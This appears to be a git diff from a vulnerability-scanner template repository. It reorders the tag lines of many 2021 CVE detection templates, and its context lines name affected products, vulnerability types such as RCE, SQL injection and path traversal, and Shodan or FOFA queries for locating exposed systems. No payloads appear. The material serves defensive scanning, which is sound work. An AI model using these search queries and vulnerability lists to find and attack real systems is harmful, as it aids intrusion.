a/http/cves/2021/CVE-2021-39312.yaml b/http/cves/2021/CVE-2021-39312.yaml index 893c620fea..e404718a53 100644 --- a/http/cves/2021/CVE-2021-39312.yaml +++ b/http/cves/2021/CVE-2021-39312.yaml @@ -24,7 +24,7 @@ info: vendor: trueranker product: true_ranker framework: wordpress - tags: unauth,lfr,wpscan,cve,cve2021,wp-plugin,lfi,wp,wordpress,trueranker + tags: cve,cve2021,unauth,lfr,wpscan,wp-plugin,lfi,wp,wordpress,trueranker http: - raw: diff --git a/http/cves/2021/CVE-2021-39316.yaml b/http/cves/2021/CVE-2021-39316.yaml index 1daf0b6c4f..8328ffde61 100644 --- a/http/cves/2021/CVE-2021-39316.yaml +++ b/http/cves/2021/CVE-2021-39316.yaml @@ -28,7 +28,7 @@ info: vendor: digitalzoomstudio product: zoomsounds framework: wordpress - tags: wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,cve,wp,cve2021,lfi,digitalzoomstudio + tags: cve2021,cve,wordpress,wp-plugin,zoomsounds,wpscan,packetstorm,wp,lfi,digitalzoomstudio http: - method: GET diff --git a/http/cves/2021/CVE-2021-39320.yaml b/http/cves/2021/CVE-2021-39320.yaml index 14666b3d30..dfb11d7cf8 100644 --- a/http/cves/2021/CVE-2021-39320.yaml +++ b/http/cves/2021/CVE-2021-39320.yaml @@ -28,7 +28,7 @@ info: vendor: underconstruction_project product: underconstruction framework: wordpress - tags: cve,cve2021,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project + tags: cve2021,cve,wp-plugin,wpscan,wordpress,wp,xss,authenticated,underconstruction_project http: - raw: diff --git a/http/cves/2021/CVE-2021-39322.yaml b/http/cves/2021/CVE-2021-39322.yaml index 4b14063014..3e58bbea0e 100644 --- a/http/cves/2021/CVE-2021-39322.yaml +++ b/http/cves/2021/CVE-2021-39322.yaml @@ -27,7 +27,7 @@ info: vendor: cybernetikz product: easy_social_icons framework: wordpress - tags: wordpress,cve,cve2021,wp-plugin,authenticated,wpscan,cybernetikz + tags: cve,cve2021,wordpress,wp-plugin,authenticated,wpscan,cybernetikz http: - raw: diff --git a/http/cves/2021/CVE-2021-39327.yaml b/http/cves/2021/CVE-2021-39327.yaml index 82057b95cb..84d50796bb 100644 --- a/http/cves/2021/CVE-2021-39327.yaml +++ b/http/cves/2021/CVE-2021-39327.yaml @@ -28,7 +28,7 @@ info: vendor: ait-pro product: bulletproof_security framework: wordpress - tags: exposure,packetstorm,cve,cve2021,wordpress,ait-pro + tags: cve2021,cve,exposure,packetstorm,wordpress,ait-pro http: - method: GET diff --git a/http/cves/2021/CVE-2021-39350.yaml b/http/cves/2021/CVE-2021-39350.yaml index 83cf5da912..582f899508 100644 --- a/http/cves/2021/CVE-2021-39350.yaml +++ b/http/cves/2021/CVE-2021-39350.yaml @@ -27,7 +27,7 @@ info: vendor: foliovision product: fv_flowplayer_video_player framework: wordpress - tags: wpscan,cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated,foliovision + tags: cve2021,cve,wpscan,wordpress,xss,wp,wp-plugin,authenticated,foliovision http: - raw: diff --git a/http/cves/2021/CVE-2021-39433.yaml b/http/cves/2021/CVE-2021-39433.yaml index 774c6eb085..aff30132d3 100644 --- a/http/cves/2021/CVE-2021-39433.yaml +++ b/http/cves/2021/CVE-2021-39433.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: biqs product: biqsdrive - tags: lfi,biqsdrive,cve,cve2021,biqs + tags: cve2021,cve,lfi,biqsdrive,biqs http: - method: GET diff --git a/http/cves/2021/CVE-2021-39501.yaml b/http/cves/2021/CVE-2021-39501.yaml index 9a43276813..807ea26f23 100644 --- a/http/cves/2021/CVE-2021-39501.yaml +++ b/http/cves/2021/CVE-2021-39501.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: eyoucms product: eyoucms - tags: cve,cve2021,redirect,eyoucms,cms + tags: cve2021,cve,redirect,eyoucms,cms http: - method: GET diff --git a/http/cves/2021/CVE-2021-40149.yaml b/http/cves/2021/CVE-2021-40149.yaml index 89d5cc3a6b..c6fe557a38 100644 --- a/http/cves/2021/CVE-2021-40149.yaml +++ b/http/cves/2021/CVE-2021-40149.yaml @@ -29,7 +29,7 @@ info: vendor: reolink product: e1_zoom_firmware shodan-query: http.title:"Reolink" - tags: exposure,unauth,packetstorm,cve,cve2021,reolink,camera,iot + tags: cve2021,cve,exposure,unauth,packetstorm,reolink,camera,iot http: - method: GET diff --git a/http/cves/2021/CVE-2021-40150.yaml b/http/cves/2021/CVE-2021-40150.yaml index e16e915158..c2e550af65 100644 --- a/http/cves/2021/CVE-2021-40150.yaml +++ b/http/cves/2021/CVE-2021-40150.yaml @@ -29,7 +29,7 @@ info: vendor: reolink product: e1_zoom_firmware shodan-query: http.title:"Reolink" - tags: cve,cve2021,reolink,camera,exposure,iot + tags: cve2021,cve,reolink,camera,exposure,iot http: - method: GET diff --git a/http/cves/2021/CVE-2021-40438.yaml b/http/cves/2021/CVE-2021-40438.yaml index ee96b6f9f8..4b7a5e2070 100644 --- a/http/cves/2021/CVE-2021-40438.yaml +++ b/http/cves/2021/CVE-2021-40438.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: apache product: http_server - tags: cve,cve2021,ssrf,apache,mod-proxy,kev + tags: cve2021,cve,ssrf,apache,mod-proxy,kev http: - method: GET diff --git a/http/cves/2021/CVE-2021-40539.yaml b/http/cves/2021/CVE-2021-40539.yaml index 6b479e15fa..e2ed55af82 100644 --- a/http/cves/2021/CVE-2021-40539.yaml +++ b/http/cves/2021/CVE-2021-40539.yaml @@ -26,7 +26,7 @@ info: max-request: 4 vendor: zohocorp product: manageengine_adselfservice_plus - tags: cve,cve2021,rce,ad,intrusive,manageengine,kev,zohocorp + tags: cve2021,cve,rce,ad,intrusive,manageengine,kev,zohocorp http: - raw: diff --git a/http/cves/2021/CVE-2021-40542.yaml b/http/cves/2021/CVE-2021-40542.yaml index f8d32dfff9..97bb2b362d 100644 --- a/http/cves/2021/CVE-2021-40542.yaml +++ b/http/cves/2021/CVE-2021-40542.yaml @@ -26,7 +26,7 @@ info: vendor: os4ed product: opensis shodan-query: http.title:"openSIS" - tags: xss,cve,cve2021,opensis,os4ed + tags: cve2021,cve,xss,opensis,os4ed http: - method: GET diff --git a/http/cves/2021/CVE-2021-40661.yaml b/http/cves/2021/CVE-2021-40661.yaml index bed9a85261..e4ecfd33c2 100644 --- a/http/cves/2021/CVE-2021-40661.yaml +++ b/http/cves/2021/CVE-2021-40661.yaml @@ -30,7 +30,7 @@ info: product: ind780_firmware shodan-query: IND780 google-query: inurl:excalweb.dll - tags: cve,cve2021,ind780,lfi,mt + tags: cve2021,cve,ind780,lfi,mt http: - method: GET diff --git a/http/cves/2021/CVE-2021-40822.yaml b/http/cves/2021/CVE-2021-40822.yaml index f01659ce61..aa05c0f5bf 100644 --- a/http/cves/2021/CVE-2021-40822.yaml +++ b/http/cves/2021/CVE-2021-40822.yaml @@ -30,7 +30,7 @@ info: product: geoserver shodan-query: title:"GeoServer" fofa-query: app="GeoServer" - tags: cve,cve2021,ssrf,geoserver,osgeo + tags: cve2021,cve,ssrf,geoserver,osgeo http: - raw: diff --git a/http/cves/2021/CVE-2021-40856.yaml b/http/cves/2021/CVE-2021-40856.yaml index 4dc2bdf7ce..46de880123 100644 --- a/http/cves/2021/CVE-2021-40856.yaml +++ b/http/cves/2021/CVE-2021-40856.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: auerswald product: comfortel_3600_ip_firmware - tags: packetstorm,cve,cve2021,comfortel,auth-bypass,auerswald + tags: cve2021,cve,packetstorm,comfortel,auth-bypass,auerswald http: - raw: diff --git a/http/cves/2021/CVE-2021-40859.yaml b/http/cves/2021/CVE-2021-40859.yaml index 5125fc2cf8..589f6d1ab7 100644 --- a/http/cves/2021/CVE-2021-40859.yaml +++ b/http/cves/2021/CVE-2021-40859.yaml @@ -26,7 +26,7 @@ info: vendor: auerswald product: compact_5500r_firmware fofa-query: '"auerswald"' - tags: cve,cve2021,iot,unauth,voip,auerswald + tags: cve2021,cve,iot,unauth,voip,auerswald http: - method: GET diff --git a/http/cves/2021/CVE-2021-40868.yaml b/http/cves/2021/CVE-2021-40868.yaml index 2fed6068f2..bab112920b 100644 --- a/http/cves/2021/CVE-2021-40868.yaml +++ b/http/cves/2021/CVE-2021-40868.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: cloudron product: cloudron - tags: cve,cve2021,xss,cloudron,packetstorm + tags: cve2021,cve,xss,cloudron,packetstorm http: - method: GET diff --git a/http/cves/2021/CVE-2021-40870.yaml b/http/cves/2021/CVE-2021-40870.yaml index 0edc81c8d7..5a68ec9fdc 100644 --- a/http/cves/2021/CVE-2021-40870.yaml +++ b/http/cves/2021/CVE-2021-40870.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: aviatrix product: controller - tags: intrusive,packetstorm,cve,cve2021,rce,aviatrix,kev,fileupload + tags: cve2021,cve,intrusive,packetstorm,rce,aviatrix,kev,fileupload http: - raw: diff --git a/http/cves/2021/CVE-2021-40875.yaml b/http/cves/2021/CVE-2021-40875.yaml index 6e9a918be3..4b3da6b8e0 100644 --- a/http/cves/2021/CVE-2021-40875.yaml +++ b/http/cves/2021/CVE-2021-40875.yaml @@ -28,7 +28,7 @@ info: vendor: gurock product: testrail shodan-query: http.html:"TestRail" - tags: cve,cve2021,exposure,gurock,testrail + tags: cve2021,cve,exposure,gurock,testrail http: - method: GET diff --git a/http/cves/2021/CVE-2021-40908.yaml b/http/cves/2021/CVE-2021-40908.yaml index 31274b8976..52de03c510 100644 --- a/http/cves/2021/CVE-2021-40908.yaml +++ b/http/cves/2021/CVE-2021-40908.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: purchase_order_management_system_project product: purchase_order_management_system - tags: cve,cve2021,sqli,purchase-order,poms,purchase_order_management_system_project + tags: cve2021,cve,sqli,purchase-order,poms,purchase_order_management_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-40960.yaml b/http/cves/2021/CVE-2021-40960.yaml index 96144a21da..18241dace1 100644 --- a/http/cves/2021/CVE-2021-40960.yaml +++ b/http/cves/2021/CVE-2021-40960.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: galera product: galera_webtemplate - tags: cve,cve2021,lfi,galera + tags: cve2021,cve,lfi,galera http: - method: GET diff --git a/http/cves/2021/CVE-2021-40968.yaml b/http/cves/2021/CVE-2021-40968.yaml index 2e6825af10..bb89c61a8c 100644 --- a/http/cves/2021/CVE-2021-40968.yaml +++ b/http/cves/2021/CVE-2021-40968.yaml @@ -28,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb,spotweb_project + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: diff --git a/http/cves/2021/CVE-2021-40969.yaml b/http/cves/2021/CVE-2021-40969.yaml index 2b78aaa2f1..2b3aa1eac4 100644 --- a/http/cves/2021/CVE-2021-40969.yaml +++ b/http/cves/2021/CVE-2021-40969.yaml @@ -28,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb,spotweb_project + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: diff --git a/http/cves/2021/CVE-2021-40970.yaml b/http/cves/2021/CVE-2021-40970.yaml index b5a48a7043..146e4201bc 100644 --- a/http/cves/2021/CVE-2021-40970.yaml +++ b/http/cves/2021/CVE-2021-40970.yaml @@ -28,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb,spotweb_project + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: diff --git a/http/cves/2021/CVE-2021-40971.yaml b/http/cves/2021/CVE-2021-40971.yaml index 76c2a8837b..b8b169de21 100644 --- a/http/cves/2021/CVE-2021-40971.yaml +++ b/http/cves/2021/CVE-2021-40971.yaml @@ -28,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb,spotweb_project + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: diff --git a/http/cves/2021/CVE-2021-40973.yaml b/http/cves/2021/CVE-2021-40973.yaml index d911bd5ec8..66085a5400 100644 --- a/http/cves/2021/CVE-2021-40973.yaml +++ b/http/cves/2021/CVE-2021-40973.yaml @@ -28,7 +28,7 @@ info: vendor: spotweb_project product: spotweb shodan-query: title:"SpotWeb - overview" - tags: cve,cve2021,xss,spotweb,spotweb_project + tags: cve2021,cve,xss,spotweb,spotweb_project http: - raw: diff --git a/http/cves/2021/CVE-2021-40978.yaml b/http/cves/2021/CVE-2021-40978.yaml index a98b9a6c66..a1d0cbfe57 100644 --- a/http/cves/2021/CVE-2021-40978.yaml +++ b/http/cves/2021/CVE-2021-40978.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: mkdocs product: mkdocs - tags: cve,cve2021,mkdocs,lfi + tags: cve2021,cve,mkdocs,lfi http: - method: GET diff --git a/http/cves/2021/CVE-2021-41174.yaml b/http/cves/2021/CVE-2021-41174.yaml index 47c25a1bb1..115c31e0a2 100644 --- a/http/cves/2021/CVE-2021-41174.yaml +++ b/http/cves/2021/CVE-2021-41174.yaml @@ -27,7 +27,7 @@ info: vendor: grafana product: grafana shodan-query: title:"Grafana" - tags: cve,cve2021,grafana,xss + tags: cve2021,cve,grafana,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-41192.yaml b/http/cves/2021/CVE-2021-41192.yaml index d35994affc..578a4a31c8 100644 --- a/http/cves/2021/CVE-2021-41192.yaml +++ b/http/cves/2021/CVE-2021-41192.yaml @@ -27,7 +27,7 @@ info: vendor: "redash" product: "redash" shodan-query: http.favicon.hash:698624197 - tags: hackerone,cve,cve2021,redash,auth-bypass + tags: cve2021,cve,hackerone,redash,auth-bypass http: - method: GET diff --git a/http/cves/2021/CVE-2021-41266.yaml b/http/cves/2021/CVE-2021-41266.yaml index adaa1bf273..8ce9fdd196 100644 --- a/http/cves/2021/CVE-2021-41266.yaml +++ b/http/cves/2021/CVE-2021-41266.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: min product: minio_console - tags: cve,cve2021,minio,min + tags: cve2021,cve,minio,min http: - raw: diff --git a/http/cves/2021/CVE-2021-41277.yaml b/http/cves/2021/CVE-2021-41277.yaml index 071f741daa..f37b0a7809 100644 --- a/http/cves/2021/CVE-2021-41277.yaml +++ b/http/cves/2021/CVE-2021-41277.yaml @@ -27,7 +27,7 @@ info: product: metabase shodan-query: http.title:"Metabase" fofa-query: app="Metabase" - tags: cve,cve2021,metabase,lfi + tags: cve2021,cve,metabase,lfi http: - method: GET diff --git a/http/cves/2021/CVE-2021-41282.yaml b/http/cves/2021/CVE-2021-41282.yaml index f10e0af819..35faaf7525 100644 --- a/http/cves/2021/CVE-2021-41282.yaml +++ b/http/cves/2021/CVE-2021-41282.yaml @@ -28,7 +28,7 @@ info: max-request: 4 vendor: pfsense product: pfsense - tags: cve,cve2021,pfsense,rce,authenticated + tags: cve2021,cve,pfsense,rce,authenticated http: - raw: diff --git a/http/cves/2021/CVE-2021-41291.yaml b/http/cves/2021/CVE-2021-41291.yaml index f0cde69d4a..c54df08730 100644 --- a/http/cves/2021/CVE-2021-41291.yaml +++ b/http/cves/2021/CVE-2021-41291.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: ecoa product: ecs_router_controller-ecs_firmware - tags: cve,cve2021,ecoa,lfi,traversal + tags: cve2021,cve,ecoa,lfi,traversal http: - raw: diff --git a/http/cves/2021/CVE-2021-41293.yaml b/http/cves/2021/CVE-2021-41293.yaml index c385c197dd..48f385a46b 100644 --- a/http/cves/2021/CVE-2021-41293.yaml +++ b/http/cves/2021/CVE-2021-41293.yaml @@ -23,7 +23,7 @@ info: max-request: 1 vendor: ecoa product: ecs_router_controller-ecs_firmware - tags: cve,cve2021,ecoa,lfi,disclosure + tags: cve2021,cve,ecoa,lfi,disclosure http: - raw: diff --git a/http/cves/2021/CVE-2021-41381.yaml b/http/cves/2021/CVE-2021-41381.yaml index 938c6510ae..e0b0a2b8c8 100644 --- a/http/cves/2021/CVE-2021-41381.yaml +++ b/http/cves/2021/CVE-2021-41381.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: payara product: micro_community - tags: cve,cve2021,payara,lfi,packetstorm + tags: cve2021,cve,payara,lfi,packetstorm http: - method: GET diff --git a/http/cves/2021/CVE-2021-41432.yaml b/http/cves/2021/CVE-2021-41432.yaml index 0c6e52fb9d..5e1f1c3579 100644 --- a/http/cves/2021/CVE-2021-41432.yaml +++ b/http/cves/2021/CVE-2021-41432.yaml @@ -27,7 +27,7 @@ info: vendor: flatpress product: flatpress shodan-query: http.html:"Flatpress" - tags: cve,cve2021,flatpress,xss,authenticated,oss,intrusive + tags: cve2021,cve,flatpress,xss,authenticated,oss,intrusive http: - raw: diff --git a/http/cves/2021/CVE-2021-41460.yaml b/http/cves/2021/CVE-2021-41460.yaml index 9bd6329978..f53717b38d 100644 --- a/http/cves/2021/CVE-2021-41460.yaml +++ b/http/cves/2021/CVE-2021-41460.yaml @@ -27,7 +27,7 @@ info: vendor: shopex product: ecshop fofa-query: product="ECShop" - tags: cve,cve2021,cnvd,cnvd2020,ecshop,sqli,shopex + tags: cve2021,cve,cnvd,cnvd2020,ecshop,sqli,shopex variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-41467.yaml b/http/cves/2021/CVE-2021-41467.yaml index 21aa2a3f99..6481ab17ea 100644 --- a/http/cves/2021/CVE-2021-41467.yaml +++ b/http/cves/2021/CVE-2021-41467.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: justwriting_project product: justwriting - tags: cve,cve2021,justwriting,xss,justwriting_project + tags: cve2021,cve,justwriting,xss,justwriting_project http: - method: GET diff --git a/http/cves/2021/CVE-2021-41569.yaml b/http/cves/2021/CVE-2021-41569.yaml index b8231993e6..98e047e073 100644 --- a/http/cves/2021/CVE-2021-41569.yaml +++ b/http/cves/2021/CVE-2021-41569.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: sas product: sas\/intrnet - tags: cve,cve2021,sas,lfi + tags: cve2021,cve,sas,lfi http: - method: GET diff --git a/http/cves/2021/CVE-2021-41648.yaml b/http/cves/2021/CVE-2021-41648.yaml index bdfdb05a13..90f6823556 100644 --- a/http/cves/2021/CVE-2021-41648.yaml +++ b/http/cves/2021/CVE-2021-41648.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: online-shopping-system-advanced_project product: online-shopping-system-advanced - tags: cve2021,sqli,packetstorm,cve,online-shopping-system-advanced_project + tags: cve2021,cve,sqli,packetstorm,online-shopping-system-advanced_project http: - method: POST diff --git a/http/cves/2021/CVE-2021-41649.yaml b/http/cves/2021/CVE-2021-41649.yaml index 81a06bcf17..44c6b838fa 100644 --- a/http/cves/2021/CVE-2021-41649.yaml +++ b/http/cves/2021/CVE-2021-41649.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: online-shopping-system-advanced_project product: online-shopping-system-advanced - tags: cve,cve2021,sqli,injection,online-shopping-system-advanced_project + tags: cve2021,cve,sqli,injection,online-shopping-system-advanced_project http: - method: POST diff --git a/http/cves/2021/CVE-2021-41653.yaml b/http/cves/2021/CVE-2021-41653.yaml index 30b547e174..7f2bf7f7f0 100644 --- a/http/cves/2021/CVE-2021-41653.yaml +++ b/http/cves/2021/CVE-2021-41653.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: tp-link product: tl-wr840n_firmware - tags: cve,cve2021,tplink,rce,router,tp-link + tags: cve2021,cve,tplink,rce,router,tp-link variables: useragent: '{{rand_base(6)}}' diff --git a/http/cves/2021/CVE-2021-41691.yaml b/http/cves/2021/CVE-2021-41691.yaml index c7901cff2a..1247604ed2 100644 --- a/http/cves/2021/CVE-2021-41691.yaml +++ b/http/cves/2021/CVE-2021-41691.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2021-41691 metadata: max-request: 2 - tags: sqli,auth,edb,cve,cve2021,opensis + tags: cve,cve2021,sqli,auth,edb,opensis variables: num: "999999999" diff --git a/http/cves/2021/CVE-2021-41749.yaml b/http/cves/2021/CVE-2021-41749.yaml index 979b798ee2..8618d6597e 100644 --- a/http/cves/2021/CVE-2021-41749.yaml +++ b/http/cves/2021/CVE-2021-41749.yaml @@ -25,7 +25,7 @@ info: product: seomatic framework: craft_cms shodan-query: 'X-Powered-By: Craft CMS html:"SEOmatic"' - tags: cve,cve2021,craftcms,cms,ssti,nystudio107,craft_cms + tags: cve2021,cve,craftcms,cms,ssti,nystudio107,craft_cms variables: num1: "{{rand_int(40000, 44800)}}" num2: "{{rand_int(40000, 44800)}}" diff --git a/http/cves/2021/CVE-2021-41773.yaml b/http/cves/2021/CVE-2021-41773.yaml index 0076708788..d6505e6f6e 100644 --- a/http/cves/2021/CVE-2021-41773.yaml +++ b/http/cves/2021/CVE-2021-41773.yaml @@ -31,7 +31,7 @@ info: vendor: apache product: http_server shodan-query: Apache 2.4.49 - tags: cve,cve2021,lfi,rce,apache,misconfig,traversal,kev + tags: cve2021,cve,lfi,rce,apache,misconfig,traversal,kev variables: cmd: "echo COP-37714-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-41826.yaml b/http/cves/2021/CVE-2021-41826.yaml index fe87253116..4c44facc0f 100644 --- a/http/cves/2021/CVE-2021-41826.yaml +++ b/http/cves/2021/CVE-2021-41826.yaml @@ -26,7 +26,7 @@ info: max-request: 1 vendor: place product: placeos_authentication - tags: redirect,edb,cve,packetstorm,cve2021,placeos,place + tags: cve2021,cve,redirect,edb,packetstorm,placeos,place http: - method: GET diff --git a/http/cves/2021/CVE-2021-41878.yaml b/http/cves/2021/CVE-2021-41878.yaml index 0d58028c8b..21d0faeffb 100644 --- a/http/cves/2021/CVE-2021-41878.yaml +++ b/http/cves/2021/CVE-2021-41878.yaml @@ -28,7 +28,7 @@ info: max-request: 1 vendor: hkurl product: i-panel_administration_system - tags: cve,cve2021,ipanel,xss,packetstorm,hkurl + tags: cve2021,cve,ipanel,xss,packetstorm,hkurl http: - method: GET diff --git a/http/cves/2021/CVE-2021-4191.yaml b/http/cves/2021/CVE-2021-4191.yaml index 19daa047a5..cfa8d22f0a 100644 --- a/http/cves/2021/CVE-2021-4191.yaml +++ b/http/cves/2021/CVE-2021-4191.yaml @@ -27,7 +27,7 @@ info: max-request: 1 vendor: gitlab product: gitlab - tags: cve,cve2021,gitlab,api,graphql,enum,unauth + tags: cve2021,cve,gitlab,api,graphql,enum,unauth http: - raw: diff --git a/http/cves/2021/CVE-2021-41951.yaml b/http/cves/2021/CVE-2021-41951.yaml index c51ee703cc..b3de31ccf3 100644 --- a/http/cves/2021/CVE-2021-41951.yaml +++ b/http/cves/2021/CVE-2021-41951.yaml @@ -24,7 +24,7 @@ info: max-request: 1 vendor: montala product: resourcespace - tags: cve,cve2021,xss,resourcespace,montala + tags: cve2021,cve,xss,resourcespace,montala http: - method: GET diff --git a/http/cves/2021/CVE-2021-42013.yaml b/http/cves/2021/CVE-2021-42013.yaml index 0531444d70..6b4cea0f7f 100644 --- a/http/cves/2021/CVE-2021-42013.yaml +++ b/http/cves/2021/CVE-2021-42013.yaml @@ -28,7 +28,7 @@ info: max-request: 3 vendor: apache product: http_server - tags: cve,cve2021,lfi,apache,rce,misconfig,traversal,kev + tags: cve2021,cve,lfi,apache,rce,misconfig,traversal,kev variables: cmd: "echo COP-37714-1202-EVC | rev" diff --git a/http/cves/2021/CVE-2021-42063.yaml b/http/cves/2021/CVE-2021-42063.yaml index f25f10a618..549c067649 100644 --- a/http/cves/2021/CVE-2021-42063.yaml +++ b/http/cves/2021/CVE-2021-42063.yaml @@ -30,7 +30,7 @@ info: product: knowledge_warehouse shodan-query: http.favicon.hash:-266008933 zoomeye-query: +app:"SAP NetWeaver Application Server httpd - tags: cve2021,sap,xss,seclists,packetstorm,cve + tags: cve2021,cve,sap,xss,seclists,packetstorm http: - method: GET diff --git a/http/cves/2021/CVE-2021-42071.yaml b/http/cves/2021/CVE-2021-42071.yaml index 6cf128dbde..ec70f95195 100644 --- a/http/cves/2021/CVE-2021-42071.yaml +++ b/http/cves/2021/CVE-2021-42071.yaml @@ -25,7 +25,7 @@ info: max-request: 1 vendor: visual-tools product: dvr_vx16_firmware - tags: edb,cve,cve2021,visualtools,rce,oast,injection,visual-tools + tags: cve2021,cve,edb,visualtools,rce,oast,injection,visual-tools http: - raw: diff --git a/http/cves/2021/CVE-2021-42192.yaml b/http/cves/2021/CVE-2021-42192.yaml index cfcf37e12d..c1079a221f 100644 --- a/http/cves/2021/CVE-2021-42192.yaml +++ b/http/cves/2021/CVE-2021-42192.yaml @@ -27,7 +27,7 @@ info: max-request: 3 vendor: konga_project product: konga - tags: authenticated,edb,cve,cve2021,konga,intrusive,konga_project + tags: cve2021,cve,authenticated,edb,konga,intrusive,konga_project http: - raw: diff --git a/http/cves/2021/CVE-2021-42237.yaml b/http/cves/2021/CVE-2021-42237.yaml index 956cf576c6..47622a9401 100644 --- a/http/cves/2021/CVE-2021-42237.yaml +++ b/http/cves/2021/CVE-2021-42237.yaml @@ -27,7 +27,7 @@ info: vendor: sitecore product: experience_platform shodan-query: http.title:"SiteCore" - tags: packetstorm,cve,cve2021,rce,sitecore,deserialization,oast,kev + tags: cve2021,cve,packetstorm,rce,sitecore,deserialization,oast,kev http: - raw: diff --git a/http/cves/2021/CVE-2021-42258.yaml b/http/cves/2021/CVE-2021-42258.yaml index 6edbcf46ec..e97b893a07 100644 --- a/http/cves/2021/CVE-2021-42258.yaml +++ b/http/cves/2021/CVE-2021-42258.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: bqe product: billquick_web_suite - tags: cve,cve2021,sqli,billquick,kev,bqe + tags: cve2021,cve,sqli,billquick,kev,bqe http: - raw: diff --git a/http/cves/2021/CVE-2021-42551.yaml b/http/cves/2021/CVE-2021-42551.yaml index aa45f2a735..452ced7671 100644 --- a/http/cves/2021/CVE-2021-42551.yaml +++ b/http/cves/2021/CVE-2021-42551.yaml @@ -24,7 +24,7 @@ info: max-request: 2 vendor: alcoda product: netbiblio - tags: cve,cve2021,xss,netbiblio,alcoda + tags: cve2021,cve,xss,netbiblio,alcoda http: - method: GET diff --git a/http/cves/2021/CVE-2021-42565.yaml b/http/cves/2021/CVE-2021-42565.yaml index d810f28903..2012fde02c 100644 --- a/http/cves/2021/CVE-2021-42565.yaml +++ b/http/cves/2021/CVE-2021-42565.yaml @@ -25,7 +25,7 @@ info: max-request: 2 vendor: myfactory product: fms - tags: cve,cve2021,myfactory,xss + tags: cve2021,cve,myfactory,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-42566.yaml b/http/cves/2021/CVE-2021-42566.yaml index 43133d89c8..496103128c 100644 --- a/http/cves/2021/CVE-2021-42566.yaml +++ b/http/cves/2021/CVE-2021-42566.yaml @@ -26,7 +26,7 @@ info: max-request: 2 vendor: myfactory product: fms - tags: cve,cve2021,myfactory,xss + tags: cve2021,cve,myfactory,xss http: - method: GET diff --git a/http/cves/2021/CVE-2021-42567.yaml b/http/cves/2021/CVE-2021-42567.yaml index 29b8ca8071..bf51477da4 100644 --- a/http/cves/2021/CVE-2021-42567.yaml +++ b/http/cves/2021/CVE-2021-42567.yaml @@ -28,7 +28,7 @@ info: vendor: apereo product: central_authentication_service shodan-query: http.title:'CAS - Central Authentication Service' - tags: cve,cve2021,apereo,xss,cas + tags: cve2021,cve,apereo,xss,cas http: - raw: diff --git a/http/cves/2021/CVE-2021-42627.yaml b/http/cves/2021/CVE-2021-42627.yaml index 8e825358f1..b784094147 100644 --- a/http/cves/2021/CVE-2021-42627.yaml +++ b/http/cves/2021/CVE-2021-42627.yaml @@ -29,7 +29,7 @@ info: vendor: dlink product: dir-615_firmware shodan-query: http.title:"Roteador Wireless" - tags: cve,cve2021,d-link,router,unauth,dir-615,roteador,dlink + tags: cve2021,cve,d-link,router,unauth,dir-615,roteador,dlink http: - method: GET diff --git a/http/cves/2021/CVE-2021-42663.yaml b/http/cves/2021/CVE-2021-42663.yaml index 60f1eb57ea..15299c2bb5 100644 --- a/http/cves/2021/CVE-2021-42663.yaml +++ b/http/cves/2021/CVE-2021-42663.yaml @@ -28,7 +28,7 @@ info: max-request: 2 vendor: online_event_booking_and_reservation_system_project product: online_event_booking_and_reservation_system - tags: cve,cve2021,xss,online_event_booking_and_reservation_system_project + tags: cve2021,cve,xss,online_event_booking_and_reservation_system_project http: - raw: diff --git a/http/cves/2021/CVE-2021-42887.yaml b/http/cves/2021/CVE-2021-42887.yaml index c12bc5a9a6..89f8792c0e 100644 --- a/http/cves/2021/CVE-2021-42887.yaml +++ b/http/cves/2021/CVE-2021-42887.yaml @@ -26,7 +26,7 @@ info: vendor: totolink product: ex1200t_firmware shodan-query: title:"TOTOLINK" - tags: totolink,auth-bypass,cve,cve2021,router + tags: cve2021,cve,totolink,auth-bypass,router http: - raw: diff --git a/http/cves/2021/CVE-2021-43287.yaml b/http/cves/2021/CVE-2021-43287.yaml index bc6d844390..bfbe4e8e16 100644 --- a/http/cves/2021/CVE-2021-43287.yaml +++ b/http/cves/2021/CVE-2021-43287.yaml @@ -27,7 +27,7 @@ info: vendor: thoughtworks product: gocd shodan-query: http.title:"Create a pipeline - Go",html:"GoCD Version" - tags: cve,cve2021,go,lfi,gocd,thoughtworks + tags: cve2021,cve,go,lfi,gocd,thoughtworks http: - method: GET diff --git a/http/cves/2021/CVE-2021-43495.yaml 